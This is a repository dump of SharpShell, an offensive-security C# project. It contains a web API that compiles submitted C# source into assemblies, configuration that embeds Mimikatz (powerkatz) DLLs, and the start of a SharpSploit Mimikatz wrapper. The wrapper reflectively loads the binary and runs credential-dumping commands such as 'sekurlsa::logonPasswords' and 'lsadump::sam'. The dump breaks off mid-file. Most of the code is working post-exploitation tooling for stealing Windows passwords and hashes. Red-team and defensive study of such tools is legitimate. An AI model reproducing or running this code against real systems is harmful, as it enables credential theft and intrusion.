| -------------------------------------------------------------------------------- /SharpShell.API/SharpShellAPI.cs: -------------------------------------------------------------------------------- 1 | // 
Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpShell (https://github.com/cobbr/SharpShell) 3 | // License: BSD 3-Clause 4 | 5 | using Microsoft.AspNetCore; 6 | using Microsoft.AspNetCore.Hosting; 7 | using Microsoft.Extensions.Configuration; 8 | using Microsoft.Extensions.DependencyInjection; 9 | 10 | using SharpShell.API.Models; 11 | 12 | namespace SharpShell.API 13 | { 14 | public class SharpShellAPI 15 | { 16 | public static void Main(string[] args) 17 | { 18 | var host = CreateWebHostBuilder(args).Build(); 19 | using (var scope = host.Services.CreateScope()) 20 | { 21 | var services = scope.ServiceProvider; 22 | var context = services.GetRequiredService(); 23 | var configuration = services.GetRequiredService(); 24 | } 25 | host.Run(); 26 | } 27 | 28 | public static IWebHostBuilder CreateWebHostBuilder(string[] args) => 29 | new WebHostBuilder() 30 | .UseKestrel(options => 31 | { 32 | options.ListenAnyIP(5000); 33 | }) 34 | .UseStartup(); 35 | } 36 | } 37 | -------------------------------------------------------------------------------- /SharpShell.API/Startup.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpShell (https://github.com/cobbr/SharpShell) 3 | // License: BSD 3-Clause 4 | 5 | using Microsoft.AspNetCore.Mvc; 6 | using Microsoft.AspNetCore.Builder; 7 | using Microsoft.AspNetCore.Hosting; 8 | using Microsoft.EntityFrameworkCore; 9 | using Microsoft.Extensions.Configuration; 10 | using Microsoft.Extensions.DependencyInjection; 11 | using Swashbuckle.AspNetCore.Swagger; 12 | using SharpShell.API.Models; 13 | 14 | namespace SharpShell.API 15 | { 16 | public class Startup 17 | { 18 | public Startup(IConfiguration configuration) 19 | { 20 | Configuration = configuration; 21 | } 22 | 23 | public IConfiguration Configuration { get; } 24 | 25 | // This method gets called by the runtime. Use this method to add services to the container. 
26 | public void ConfigureServices(IServiceCollection services) 27 | { 28 | services.AddMvc().SetCompatibilityVersion(CompatibilityVersion.Version_2_1); 29 | 30 | services.AddDbContext(opt => 31 | { 32 | opt.UseInMemoryDatabase("SharpShellDB"); 33 | }); 34 | 35 | services.AddSwaggerGen(c => 36 | { 37 | c.SwaggerDoc("v1", new Info { Title = "SharpShell.API", Version = "v0.1" }); 38 | }); 39 | } 40 | 41 | // This method gets called by the runtime. Use this method to configure the HTTP request pipeline. 42 | public void Configure(IApplicationBuilder app, IHostingEnvironment env) 43 | { 44 | if (env.IsDevelopment()) 45 | { 46 | app.UseDeveloperExceptionPage(); 47 | } 48 | app.UseSwagger(); 49 | app.UseSwaggerUI(c => 50 | { 51 | c.SwaggerEndpoint("/swagger/v1/swagger.json", "SharpShell.API v0.1"); 52 | }); 53 | 54 | app.UseMvc(); 55 | } 56 | } 57 | } 58 | -------------------------------------------------------------------------------- /SharpShell.API/appsettings.Development.json: -------------------------------------------------------------------------------- 1 | { 2 | "Logging": { 3 | "LogLevel": { 4 | "Default": "Debug", 5 | "System": "Information", 6 | "Microsoft": "Information" 7 | } 8 | } 9 | } 10 | -------------------------------------------------------------------------------- /SharpShell.API/appsettings.json: -------------------------------------------------------------------------------- 1 | { 2 | "Logging": { 3 | "LogLevel": { 4 | "Default": "Warning" 5 | } 6 | }, 7 | "AllowedHosts": "*" 8 | } 9 | -------------------------------------------------------------------------------- /SharpShell.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28010.2016 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpShell", "SharpShell\SharpShell.csproj", 
"{BDBA47C5-E823-4404-91D0-7F6561279525}" 7 | EndProject 8 | Project("{9A19103F-16F7-4668-BE54-9A1E7A4F7556}") = "SharpShell.API", "SharpShell.API\SharpShell.API.csproj", "{09FDD9AA-90B1-4F86-B283-3DF519CA8628}" 9 | EndProject 10 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpShell.API.SharpShell", "SharpShell.API.SharpShell\SharpShell.API.SharpShell.csproj", "{B84548DC-D926-4B39-8293-FA0BDEF34D49}" 11 | EndProject 12 | Global 13 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 14 | Debug|Any CPU = Debug|Any CPU 15 | Release|Any CPU = Release|Any CPU 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {BDBA47C5-E823-4404-91D0-7F6561279525}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 19 | {BDBA47C5-E823-4404-91D0-7F6561279525}.Debug|Any CPU.Build.0 = Debug|Any CPU 20 | {BDBA47C5-E823-4404-91D0-7F6561279525}.Release|Any CPU.ActiveCfg = Release|Any CPU 21 | {BDBA47C5-E823-4404-91D0-7F6561279525}.Release|Any CPU.Build.0 = Release|Any CPU 22 | {09FDD9AA-90B1-4F86-B283-3DF519CA8628}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 23 | {09FDD9AA-90B1-4F86-B283-3DF519CA8628}.Debug|Any CPU.Build.0 = Debug|Any CPU 24 | {09FDD9AA-90B1-4F86-B283-3DF519CA8628}.Release|Any CPU.ActiveCfg = Release|Any CPU 25 | {09FDD9AA-90B1-4F86-B283-3DF519CA8628}.Release|Any CPU.Build.0 = Release|Any CPU 26 | {B84548DC-D926-4B39-8293-FA0BDEF34D49}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 27 | {B84548DC-D926-4B39-8293-FA0BDEF34D49}.Debug|Any CPU.Build.0 = Debug|Any CPU 28 | {B84548DC-D926-4B39-8293-FA0BDEF34D49}.Release|Any CPU.ActiveCfg = Release|Any CPU 29 | {B84548DC-D926-4B39-8293-FA0BDEF34D49}.Release|Any CPU.Build.0 = Release|Any CPU 30 | EndGlobalSection 31 | GlobalSection(SolutionProperties) = preSolution 32 | HideSolutionNode = FALSE 33 | EndGlobalSection 34 | GlobalSection(ExtensibilityGlobals) = postSolution 35 | SolutionGuid = {508697D8-3450-4B88-B90C-B89C5ED758FB} 36 | EndGlobalSection 37 | EndGlobal 38 | 
-------------------------------------------------------------------------------- /SharpShell/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | -------------------------------------------------------------------------------- /SharpShell/Common.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpShell (https://github.com/cobbr/SharpShell) 3 | // License: BSD 3-Clause 4 | 5 | using System.IO; 6 | using System.Text; 7 | using System.Reflection; 8 | 9 | namespace SharpShell 10 | { 11 | public static class Common 12 | { 13 | public static Encoding SharpShellEncoding = Encoding.UTF8; 14 | public static string SharpShellDirectory = Assembly.GetExecutingAssembly().Location.SplitFirst("bin"); 15 | public static string SharpShellDataDirectory = SharpShellDirectory + "Data" + Path.DirectorySeparatorChar; 16 | 17 | public static string SharpShellResourcesDirectory = SharpShellDataDirectory + "Resources" + Path.DirectorySeparatorChar; 18 | public static string SharpShellResourcesConfig = SharpShellResourcesDirectory + "resources.yml"; 19 | 20 | public static string SharpShellReferencesDirectory = SharpShellDataDirectory + "References" + Path.DirectorySeparatorChar; 21 | public static string SharpShellReferencesConfig = SharpShellReferencesDirectory + "references.yml"; 22 | 23 | public static string Net35Directory = SharpShellReferencesDirectory + "net35" + Path.DirectorySeparatorChar; 24 | public static string Net40Directory = SharpShellReferencesDirectory + "net40" + Path.DirectorySeparatorChar; 25 | 26 | public static string SharpShellSourceDirectory = SharpShellDataDirectory + "Source" + Path.DirectorySeparatorChar; 27 | } 28 | 29 | public static class Utilities 30 | { 31 | public static string 
SplitFirst(this string original, string split) 32 | { 33 | int index = original.IndexOf(split); 34 | if (index == -1) { return original; } 35 | return original.Substring(0, index); 36 | } 37 | } 38 | } -------------------------------------------------------------------------------- /SharpShell/Compiler.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpShell (https://github.com/cobbr/SharpShell) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.IO; 7 | using System.Text; 8 | using System.Linq; 9 | using System.IO.Compression; 10 | using System.Collections.Generic; 11 | 12 | using Microsoft.CodeAnalysis; 13 | using Microsoft.CodeAnalysis.CSharp; 14 | using Microsoft.CodeAnalysis.CSharp.Syntax; 15 | using Microsoft.CodeAnalysis.Emit; 16 | 17 | namespace SharpShell 18 | { 19 | public class Compiler 20 | { 21 | public class CompilationRequest 22 | { 23 | public string Source { get; set; } = null; 24 | public string SourceDirectory { get; set; } = null; 25 | public string ResourceDirectory { get; set; } = null; 26 | public string ReferenceDirectory { get; set; } = null; 27 | 28 | public DotNetVersion TargetDotNetVersion { get; set; } = DotNetVersion.Net35; 29 | public OutputKind OutputKind { get; set; } = OutputKind.DynamicallyLinkedLibrary; 30 | public Platform Platform { get; set; } = Platform.AnyCpu; 31 | public bool Optimize = true; 32 | 33 | public string AssemblyName { get; set; } = null; 34 | public List References { get; set; } = new List(); 35 | public List EmbeddedResources { get; set; } = new List(); 36 | } 37 | 38 | public enum DotNetVersion 39 | { 40 | Net35, 41 | Net40 42 | } 43 | 44 | public class EmbeddedResource 45 | { 46 | public string Name { get; set; } 47 | public string File { get; set; } 48 | public Platform Platform { get; set; } = Platform.AnyCpu; 49 | public bool Enabled { get; set; } = false; 50 | } 51 | 52 | public class Reference 53 
| { 54 | public string File { get; set; } 55 | public DotNetVersion Framework { get; set; } = DotNetVersion.Net35; 56 | public bool Enabled { get; set; } = false; 57 | } 58 | 59 | private class SourceSyntaxTree 60 | { 61 | public string FileName { get; set; } = ""; 62 | public SyntaxTree SyntaxTree { get; set; } 63 | public List UsedTypes { get; set; } = new List(); 64 | } 65 | 66 | /* Compiles request.Source together with every *.cs file found under request.SourceDirectory and returns the emitted assembly bytes; throws CompilerException carrying the diagnostics when emit fails. When request.Optimize is set, the compilation is built twice: once to find the used types, then again without the unused trees and using directives. */ public static byte[] Compile(CompilationRequest request) 67 | { 68 | // Gather SyntaxTrees for compilation 69 | List sourceSyntaxTrees = Directory.GetFiles(request.SourceDirectory, "*.cs", SearchOption.AllDirectories) 70 | .Select(F => new SourceSyntaxTree { FileName = F, SyntaxTree = CSharpSyntaxTree.ParseText(File.ReadAllText(F), new CSharpParseOptions()) }) 71 | .ToList(); 72 | List compilationTrees = sourceSyntaxTrees.Select(S => S.SyntaxTree).ToList(); 73 | 74 | /* NOTE(review): request.Source is parsed and compiled unmodified, so whoever can submit a CompilationRequest controls the emitted assembly; confirm which callers can reach this method. */ SyntaxTree sourceTree = CSharpSyntaxTree.ParseText(request.Source, new CSharpParseOptions()); 75 | compilationTrees.Add(sourceTree); 76 | 77 | // Use specified OutputKind and Platform 78 | CSharpCompilationOptions options = new CSharpCompilationOptions(outputKind: request.OutputKind, optimizationLevel: OptimizationLevel.Release, platform: request.Platform); 79 | // Compile to obtain SemanticModel 80 | CSharpCompilation compilation = CSharpCompilation.Create( 81 | request.AssemblyName == null ? Path.GetRandomFileName() : request.AssemblyName, 82 | compilationTrees, 83 | request.References.Where(R => R.Framework == request.TargetDotNetVersion).Where(R => R.Enabled).Select(R => 84 | { 85 | string folder = (request.TargetDotNetVersion == DotNetVersion.Net35 ? 
request.ReferenceDirectory + "net35" + Path.DirectorySeparatorChar : request.ReferenceDirectory + "net40" + Path.DirectorySeparatorChar); 86 | /* NOTE(review): the reference path is folder + R.File by plain string concatenation; nothing here checks that R.File is a bare file name, so this is only safe while References come from trusted configuration. */ return MetadataReference.CreateFromFile(folder + R.File); 87 | }).ToList(), 88 | options 89 | ); 90 | 91 | // Perform source code optimization, removing unused types 92 | if (request.Optimize) 93 | { 94 | // Find all Types used by the generated compilation 95 | List usedTypes = new List(); 96 | GetUsedTypesRecursively(compilation, sourceTree, ref usedTypes, ref sourceSyntaxTrees); 97 | usedTypes = usedTypes.Distinct().ToList(); 98 | List usedTypeNames = usedTypes.Select(T => GetFullyQualifiedTypeName(T)).ToList(); 99 | // SharpGenConsole.PrintInfoLine("usedTypes: " + String.Join(",", usedTypeNames)); 100 | 101 | // Filter SyntaxTrees to trees that define a used Type, otherwise the tree is not needed in this compilation 102 | compilationTrees = sourceSyntaxTrees.Where(SST => SyntaxTreeDefinesUsedType(compilation, SST.SyntaxTree, usedTypeNames)) 103 | .Select(SST => SST.SyntaxTree) 104 | .ToList(); 105 | 106 | // Removed unused Using statements from the additional entrypoint source 107 | List usedNamespaceNames = GetUsedTypes(compilation, sourceTree) 108 | .Select(T => GetFullyQualifiedContainingNamespaceName(T)).Distinct().ToList(); 109 | // SharpGenConsole.PrintInfoLine("usedNamespaces: " + String.Join(",", usedNamespaceNames)); 110 | List unusedUsingDirectives = sourceTree.GetRoot().DescendantNodes().Where(N => 111 | { 112 | return N.Kind() == SyntaxKind.UsingDirective && !usedNamespaceNames.Contains(((UsingDirectiveSyntax)N).Name.ToFullString()); 113 | }).ToList(); 114 | sourceTree = sourceTree.GetRoot().RemoveNodes(unusedUsingDirectives, SyntaxRemoveOptions.KeepNoTrivia).SyntaxTree; 115 | 116 | // Compile again, with unused SyntaxTrees and unused using statements removed 117 | compilationTrees.Add(sourceTree); 118 | compilation = CSharpCompilation.Create( 119 | request.AssemblyName == null ? 
Path.GetRandomFileName() : request.AssemblyName, 120 | compilationTrees, 121 | request.References.Where(R => R.Framework == request.TargetDotNetVersion).Where(R => R.Enabled).Select(R => 122 | { 123 | string folder = (request.TargetDotNetVersion == DotNetVersion.Net35 ? request.ReferenceDirectory + "net35" + Path.DirectorySeparatorChar : request.ReferenceDirectory + "net40" + Path.DirectorySeparatorChar); 124 | /* Same unchecked folder + R.File concatenation as in the first CSharpCompilation.Create call. */ return MetadataReference.CreateFromFile(folder + R.File); 125 | }).ToList(), 126 | options 127 | ); 128 | } 129 | 130 | // Emit compilation 131 | EmitResult emitResult; 132 | byte[] ILbytes = null; 133 | using (var ms = new MemoryStream()) 134 | { 135 | emitResult = compilation.Emit( 136 | ms, 137 | manifestResources: request.EmbeddedResources.Where(ER => 138 | { 139 | return request.Platform == Platform.AnyCpu || ER.Platform == Platform.AnyCpu || ER.Platform == request.Platform; 140 | }).Where(ER => ER.Enabled).Select(ER => 141 | { 142 | /* NOTE(review): request.ResourceDirectory + ER.File is opened without checking that ER.File stays inside ResourceDirectory; the file's contents are embedded into the output assembly, so EmbeddedResources must come from trusted configuration. */ return new ResourceDescription(ER.Name, () => File.OpenRead(request.ResourceDirectory + ER.File), true); 143 | }).ToList() 144 | ); 145 | if (emitResult.Success) 146 | { 147 | ms.Flush(); 148 | ms.Seek(0, SeekOrigin.Begin); 149 | ILbytes = ms.ToArray(); 150 | } 151 | else 152 | { 153 | StringBuilder sb = new StringBuilder(); 154 | foreach (Diagnostic d in emitResult.Diagnostics) 155 | { 156 | sb.AppendLine(d.ToString()); 157 | } 158 | throw new CompilerException("CompilationErrors: " + Environment.NewLine + sb); 159 | } 160 | } 161 | return ILbytes; 162 | } 163 | 164 | private static string GetFullyQualifiedContainingNamespaceName(INamespaceSymbol namespaceSymbol) 165 | { 166 | string name = namespaceSymbol.Name; 167 | namespaceSymbol = namespaceSymbol.ContainingNamespace; 168 | while (namespaceSymbol != null) 169 | { 170 | name = namespaceSymbol.Name + "." 
+ name; 171 | namespaceSymbol = namespaceSymbol.ContainingNamespace; 172 | } 173 | return name.Trim('.'); 174 | } 175 | 176 | private static string GetFullyQualifiedContainingNamespaceName(INamedTypeSymbol namedTypeSymbol) 177 | { 178 | return GetFullyQualifiedContainingNamespaceName(namedTypeSymbol.ContainingNamespace); 179 | } 180 | 181 | private static string GetFullyQualifiedTypeName(INamedTypeSymbol namedTypeSymbol) 182 | { 183 | return GetFullyQualifiedContainingNamespaceName(namedTypeSymbol) + "." + namedTypeSymbol.Name; 184 | } 185 | 186 | private static bool SyntaxTreeDefinesUsedType(CSharpCompilation compilation, SyntaxTree tree, List typeNames) 187 | { 188 | SemanticModel model = compilation.GetSemanticModel(tree); 189 | return null != tree.GetRoot().DescendantNodes().FirstOrDefault(SN => 190 | { 191 | if (SN.Kind() != SyntaxKind.ClassDeclaration) 192 | { 193 | return false; 194 | } 195 | INamedTypeSymbol symbol = model.GetDeclaredSymbol(((ClassDeclarationSyntax)SN)); 196 | if (symbol == null) 197 | { 198 | return false; 199 | } 200 | return typeNames.Contains( 201 | GetFullyQualifiedTypeName(symbol) 202 | ); 203 | }); 204 | } 205 | 206 | private static List GetUsedTypes(CSharpCompilation compilation, SyntaxTree sourceTree) 207 | { 208 | return sourceTree.GetRoot().DescendantNodes().Select(N => 209 | { 210 | ISymbol symbol = compilation.GetSemanticModel(sourceTree).GetSymbolInfo(N).Symbol; 211 | if (symbol != null && symbol.ContainingType != null) 212 | { 213 | return symbol.ContainingType; 214 | } 215 | return null; 216 | }).Distinct().Where(T => T != null).ToList(); 217 | } 218 | 219 | private static List GetUsedTypesRecursively(CSharpCompilation compilation, SyntaxTree sourceTree, ref List currentUsedTypes, ref List sourceSyntaxTrees) 220 | { 221 | List copyCurrentUsedTypes = currentUsedTypes.Select(CT => GetFullyQualifiedTypeName(CT)).ToList(); 222 | List usedTypes = GetUsedTypes(compilation, sourceTree) 223 | .Where(T => 
!copyCurrentUsedTypes.Contains(GetFullyQualifiedTypeName(T))) 224 | .ToList(); 225 | currentUsedTypes.AddRange(usedTypes); 226 | 227 | List searchTrees = new List(); 228 | foreach (INamedTypeSymbol symbol in usedTypes) 229 | { 230 | SyntaxReference sr = symbol.DeclaringSyntaxReferences.FirstOrDefault(); 231 | if (sr != null) 232 | { 233 | SourceSyntaxTree sst = sourceSyntaxTrees.FirstOrDefault(SST => SST.SyntaxTree == sr.SyntaxTree); 234 | if (sst != null) { sst.UsedTypes.Add(symbol); } 235 | string fullyQualifiedTypeName = GetFullyQualifiedTypeName(symbol); 236 | searchTrees.Add(sr.SyntaxTree); 237 | } 238 | } 239 | 240 | searchTrees = searchTrees.Distinct().ToList(); 241 | foreach (SyntaxTree tree in searchTrees) 242 | { 243 | List newTypes = GetUsedTypesRecursively(compilation, tree, ref currentUsedTypes, ref sourceSyntaxTrees); 244 | currentUsedTypes.AddRange(newTypes); 245 | } 246 | return currentUsedTypes; 247 | } 248 | 249 | public static byte[] Compress(byte[] bytes) 250 | { 251 | byte[] compressedILBytes; 252 | using (MemoryStream memoryStream = new MemoryStream()) 253 | { 254 | using (DeflateStream deflateStream = new DeflateStream(memoryStream, CompressionMode.Compress)) 255 | { 256 | deflateStream.Write(bytes, 0, bytes.Length); 257 | } 258 | compressedILBytes = memoryStream.ToArray(); 259 | } 260 | return compressedILBytes; 261 | } 262 | } 263 | 264 | public class CompilerException : Exception 265 | { 266 | public CompilerException() 267 | { 268 | 269 | } 270 | 271 | public CompilerException(string message) : base(message) 272 | { 273 | 274 | } 275 | 276 | public CompilerException(string message, Exception inner) : base(message, inner) 277 | { 278 | 279 | } 280 | } 281 | } -------------------------------------------------------------------------------- /SharpShell/Data/References/net35/System.Core.dll: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net35/System.Core.dll -------------------------------------------------------------------------------- /SharpShell/Data/References/net35/System.DirectoryServices.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net35/System.DirectoryServices.dll -------------------------------------------------------------------------------- /SharpShell/Data/References/net35/System.IdentityModel.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net35/System.IdentityModel.dll -------------------------------------------------------------------------------- /SharpShell/Data/References/net35/System.Management.Automation.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net35/System.Management.Automation.dll -------------------------------------------------------------------------------- /SharpShell/Data/References/net35/System.Management.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net35/System.Management.dll -------------------------------------------------------------------------------- /SharpShell/Data/References/net35/System.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net35/System.dll 
-------------------------------------------------------------------------------- /SharpShell/Data/References/net35/mscorlib.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net35/mscorlib.dll -------------------------------------------------------------------------------- /SharpShell/Data/References/net40/System.Core.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net40/System.Core.dll -------------------------------------------------------------------------------- /SharpShell/Data/References/net40/System.DirectoryServices.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net40/System.DirectoryServices.dll -------------------------------------------------------------------------------- /SharpShell/Data/References/net40/System.IdentityModel.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net40/System.IdentityModel.dll -------------------------------------------------------------------------------- /SharpShell/Data/References/net40/System.Management.Automation.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net40/System.Management.Automation.dll -------------------------------------------------------------------------------- /SharpShell/Data/References/net40/System.Management.dll: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net40/System.Management.dll -------------------------------------------------------------------------------- /SharpShell/Data/References/net40/System.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net40/System.dll -------------------------------------------------------------------------------- /SharpShell/Data/References/net40/mscorlib.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net40/mscorlib.dll -------------------------------------------------------------------------------- /SharpShell/Data/References/references.yml: -------------------------------------------------------------------------------- 1 | - File: mscorlib.dll 2 | Framework: Net35 3 | Enabled: true 4 | - File: System.dll 5 | Framework: Net35 6 | Enabled: true 7 | - File: System.Core.dll 8 | Framework: Net35 9 | Enabled: true 10 | - File: System.Management.dll 11 | Framework: Net35 12 | Enabled: true 13 | - File: System.IdentityModel.dll 14 | Framework: Net35 15 | Enabled: true 16 | - File: System.DirectoryServices.dll 17 | Framework: Net35 18 | Enabled: true 19 | - File: System.Management.Automation.dll 20 | Framework: Net35 21 | Enabled: true 22 | - File: mscorlib.dll 23 | Framework: Net40 24 | Enabled: true 25 | - File: System.dll 26 | Framework: Net40 27 | Enabled: true 28 | - File: System.Core.dll 29 | Framework: Net40 30 | Enabled: true 31 | - File: System.Management.dll 32 | Framework: Net40 33 | Enabled: true 34 | - File: System.IdentityModel.dll 35 | Framework: Net40 36 | Enabled: 
true 37 | - File: System.DirectoryServices.dll 38 | Framework: Net40 39 | Enabled: true 40 | - File: System.Management.Automation.dll 41 | Framework: Net40 42 | Enabled: true -------------------------------------------------------------------------------- /SharpShell/Data/Resources/powerkatz_x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/Resources/powerkatz_x64.dll -------------------------------------------------------------------------------- /SharpShell/Data/Resources/powerkatz_x64.dll.comp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/Resources/powerkatz_x64.dll.comp -------------------------------------------------------------------------------- /SharpShell/Data/Resources/powerkatz_x86.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/Resources/powerkatz_x86.dll -------------------------------------------------------------------------------- /SharpShell/Data/Resources/powerkatz_x86.dll.comp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/Resources/powerkatz_x86.dll.comp -------------------------------------------------------------------------------- /SharpShell/Data/Resources/resources.yml: -------------------------------------------------------------------------------- 1 | - Name: SharpSploit.Resources.powerkatz_x86.dll 2 | File: powerkatz_x86.dll 3 | Platform: x86 4 | Enabled: false 5 | - Name: SharpSploit.Resources.powerkatz_x64.dll 6 | File: powerkatz_x64.dll 7 | Platform: x64 8 | 
Enabled: false 9 | - Name: SharpSploit.Resources.powerkatz_x86.dll.comp 10 | File: powerkatz_x86.dll.comp 11 | Platform: x86 12 | Enabled: true 13 | - Name: SharpSploit.Resources.powerkatz_x64.dll.comp 14 | File: powerkatz_x64.dll.comp 15 | Platform: x64 16 | Enabled: true -------------------------------------------------------------------------------- /SharpShell/Data/Source/SharpSploit/Credentials/Mimikatz.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Text; 7 | using System.Net.NetworkInformation; 8 | using System.Runtime.InteropServices; 9 | 10 | using SharpSploit.Misc; 11 | using SharpSploit.Execution; 12 | 13 | namespace SharpSploit.Credentials 14 | { 15 | /// 16 | /// (SharpSploit.Credentials.)Mimikatz is a library for executing Mimikatz functions. SharpSploit's implementation 17 | /// uses a PE Loader to execute Mimikatz functions. This is a wrapper class that loads the PE and executes user- 18 | /// specified Mimikatz functions 19 | /// 20 | /// 21 | /// Mimikatz is a tool for playing with credentials in Windows, written by Benjamin Delpy (@gentilkiwi). (Found 22 | /// at https://github.com/gentilkiwi/mimikatz). 23 | /// SharpSploit's PE Loader is adapted from work by Casey Smith (@subtee). (No longer available at original location.) 24 | /// This wrapper class is adapted from Chris Ross (@xorrior)'s implementation. 
(Found 25 | /// at https://github.com/xorrior/Random-CSharpTools/tree/master/DllLoader/DllLoader) 26 | /// 27 | public class Mimikatz 28 | { 29 | private static byte[] PEBytes32 { get; set; } 30 | private static byte[] PEBytes64 { get; set; } 31 | 32 | private static PE MimikatzPE { get; set; } = null; 33 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 34 | private delegate IntPtr MimikatzType(IntPtr command); 35 | 36 | /// 37 | /// Loads the Mimikatz PE with `PE.Load()` and executes a chosen Mimikatz command. 38 | /// 39 | /// Mimikatz command to be executed. 40 | /// Mimikatz output. 41 | public static string Command(string Command = "privilege::debug sekurlsa::logonPasswords") 42 | { 43 | // Console.WriteLine(String.Join(",", System.Reflection.Assembly.GetExecutingAssembly().GetManifestResourceNames())); 44 | if (MimikatzPE == null) 45 | { 46 | string[] manifestResources = System.Reflection.Assembly.GetExecutingAssembly().GetManifestResourceNames(); 47 | if (IntPtr.Size == 4 && MimikatzPE == null) 48 | { 49 | if (PEBytes32 == null) 50 | { 51 | PEBytes32 = Utilities.GetEmbeddedResourceBytes("powerkatz_x86.dll"); 52 | if (PEBytes32 == null) { return ""; } 53 | } 54 | MimikatzPE = PE.Load(PEBytes32); 55 | } 56 | else if (IntPtr.Size == 8 && MimikatzPE == null) 57 | { 58 | if (PEBytes64 == null) 59 | { 60 | PEBytes64 = Utilities.GetEmbeddedResourceBytes("powerkatz_x64.dll"); 61 | if (PEBytes64 == null) { return ""; } 62 | } 63 | MimikatzPE = PE.Load(PEBytes64); 64 | } 65 | } 66 | if (MimikatzPE == null) { return ""; } 67 | IntPtr functionPointer = MimikatzPE.GetFunctionExport("powershell_reflective_mimikatz"); 68 | if (functionPointer == IntPtr.Zero) { return ""; } 69 | 70 | MimikatzType mimikatz = (MimikatzType) Marshal.GetDelegateForFunctionPointer(functionPointer, typeof(MimikatzType)); 71 | IntPtr input = Marshal.StringToHGlobalUni(Command); 72 | try 73 | { 74 | IntPtr output = mimikatz(input); 75 | return Marshal.PtrToStringUni(output); 76 | } 77 | catch 
(Exception e) 78 | { 79 | Console.Error.WriteLine("MimikatzException: " + e.Message + e.StackTrace); 80 | return ""; 81 | } 82 | } 83 | 84 | /// 85 | /// Loads the Mimikatz PE with `PE.Load()` and executes the Mimikatzcommand to retrieve plaintext 86 | /// passwords from LSASS. Equates to `Command("privilege::debug sekurlsa::logonPasswords")`. (Requires Admin) 87 | /// 88 | /// Mimikatz output. 89 | public static string LogonPasswords() 90 | { 91 | return Command("privilege::debug sekurlsa::logonPasswords"); 92 | } 93 | 94 | /// 95 | /// Loads the Mimikatz PE with `PE.Load()` and executes the Mimikatz command to retrieve password hashes 96 | /// from the SAM database. Equates to `Command("privilege::debug lsadump::sam")`. (Requires Admin) 97 | /// 98 | /// Mimikatz output. 99 | public static string SamDump() 100 | { 101 | return Command("privilege::debug lsadump::sam"); 102 | } 103 | 104 | /// 105 | /// Loads the Mimikatz PE with `PE.Load()` and executes the Mimikatz command to retrieve LSA secrets 106 | /// stored in registry. Equates to `Command("privilege::debug 